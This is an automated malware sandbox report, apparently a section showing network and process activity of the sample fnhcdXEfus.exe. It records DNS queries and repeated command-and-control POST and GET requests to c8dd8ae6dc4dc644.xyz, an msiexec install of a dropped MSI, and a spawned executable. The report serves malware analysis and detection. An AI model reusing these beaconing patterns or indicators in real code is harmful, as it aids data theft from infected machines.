                                                                                                                                                                        Jan 30, 2021 14:31:11.625024080 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:11.716563940 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:11.764661074 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.813039064 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:12.870054007 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:25.467396975 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:25.526074886 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:26.411195993 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:26.472259045 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:30.517733097 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:30.565696001 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:34.455287933 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:34.518182039 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:46.341963053 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:46.401180983 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:50.290890932 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:50.351835966 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:57.012736082 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:31:57.076771975 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:11.929363966 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:32:11.979888916 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:14.633821011 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:32:14.691749096 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:18.156292915 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:32:18.213793039 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:47.297877073 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:32:47.348635912 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:32:49.496135950 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:32:49.552444935 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:48.546044111 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:48.607614040 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:49.110194921 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:49.168859005 CET53612928.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:49.914505959 CET6361953192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:49.973222017 CET53636198.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:50.355093002 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:50.411541939 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:50.791915894 CET6194653192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:50.851511002 CET53619468.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:51.299077034 CET6491053192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:51.358753920 CET53649108.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:51.802645922 CET5212353192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:51.861876965 CET53521238.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:52.431047916 CET5613053192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:52.482070923 CET53561308.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:53.109553099 CET5633853192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:53.165901899 CET53563388.8.8.8192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:33:53.538415909 CET5942053192.168.2.38.8.8.8
                                                                                                                                                                        Jan 30, 2021 14:33:53.586457968 CET53594208.8.8.8192.168.2.3

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                        Jan 30, 2021 14:31:11.568495989 CET192.168.2.38.8.8.80xada2Standard query (0)c8dd8ae6dc4dc644.xyzA (IP address)IN (0x0001)
                                                                                                                                                                        Jan 30, 2021 14:31:25.467396975 CET192.168.2.38.8.8.80xc24bStandard query (0)c8dd8ae6dc4dc644.xyzA (IP address)IN (0x0001)
                                                                                                                                                                        Jan 30, 2021 14:31:26.411195993 CET192.168.2.38.8.8.80x9506Standard query (0)c8dd8ae6dc4dc644.xyzA (IP address)IN (0x0001)
                                                                                                                                                                        Jan 30, 2021 14:32:18.156292915 CET192.168.2.38.8.8.80xfc84Standard query (0)C8DD8AE6DC4DC644.xyzA (IP address)IN (0x0001)

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                        Jan 30, 2021 14:31:11.625024080 CET8.8.8.8192.168.2.30xada2No error (0)c8dd8ae6dc4dc644.xyz34.94.64.66A (IP address)IN (0x0001)
                                                                                                                                                                        Jan 30, 2021 14:31:25.526074886 CET8.8.8.8192.168.2.30xc24bNo error (0)c8dd8ae6dc4dc644.xyz34.94.64.66A (IP address)IN (0x0001)
                                                                                                                                                                        Jan 30, 2021 14:31:26.472259045 CET8.8.8.8192.168.2.30x9506No error (0)c8dd8ae6dc4dc644.xyz34.94.64.66A (IP address)IN (0x0001)
                                                                                                                                                                        Jan 30, 2021 14:32:18.213793039 CET8.8.8.8192.168.2.30xfc84No error (0)C8DD8AE6DC4DC644.xyz34.94.64.66A (IP address)IN (0x0001)

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • c8dd8ae6dc4dc644.xyz

                                                                                                                                                                        HTTP Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        0192.168.2.34971934.94.64.6680C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Jan 30, 2021 14:31:11.824554920 CET144OUTPOST //fine/send HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:12.335077047 CET149INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:12 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:12.365892887 CET150OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 93
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:13.742291927 CET169INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:13 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:13.833859921 CET171OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 93
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:17.383786917 CET172INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:17 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:19.318113089 CET172OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 93
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:22.825290918 CET173INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:22 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        1192.168.2.34972234.94.64.6680C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Jan 30, 2021 14:31:25.730926037 CET174OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:30.286595106 CET204INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:30 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:37.934276104 CET348OUTPOST /info_old/e HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 677
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:39.173599005 CET350INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:39 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 110
                                                                                                                                                                        Jan 30, 2021 14:31:39.186463118 CET350OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:43.455353975 CET439INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:43 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:43.785324097 CET440OUTPOST /info_old/g HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:45.013859987 CET526INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:44 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:45.142966032 CET527OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:49.696033001 CET534INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:49 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:49.710333109 CET534OUTGET /info_old/r HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:50.896301031 CET542INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:50 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: c6mtnVXGhd10~0
                                                                                                                                                                        Jan 30, 2021 14:32:07.928347111 CET575OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:32:12.093523979 CET577INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:32:12 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        2192.168.2.34972334.94.64.6680C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Jan 30, 2021 14:31:26.687041998 CET175OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:32.487735033 CET228INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:32 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:33.553212881 CET228OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:38.112478018 CET349INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:38 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        3192.168.2.34973934.94.64.6680C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Jan 30, 2021 14:32:18.439049006 CET3354OUTGET /info_old/ddd HTTP/1.1
                                                                                                                                                                        Host: C8DD8AE6DC4DC644.xyz
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Jan 30, 2021 14:32:20.674977064 CET5291INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:32:20 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 63 0d 0a 34 48 41 6f 5a 6c 35 47 46 54 63 7e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: c4HAoZl5GFTc~0


                                                                                                                                                                        Code Manipulations

                                                                                                                                                                        Statistics

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        Analysis Process: fnhcdXEfus.exe PID: 5976 Parent PID: 5664

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:06
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Users\user\Desktop\fnhcdXEfus.exe'
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:4453376 bytes
                                                                                                                                                                        MD5 hash:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        Analysis Process: msiexec.exe PID: 4084 Parent PID: 5976

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:10
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                        File size:59904 bytes
                                                                                                                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Analysis Process: msiexec.exe PID: 3492 Parent PID: 1528

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:11
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C
                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                        File size:59904 bytes
                                                                                                                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Analysis Process: 63C4F3D9EA0CC861.exe PID: 3664 Parent PID: 5976

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:17
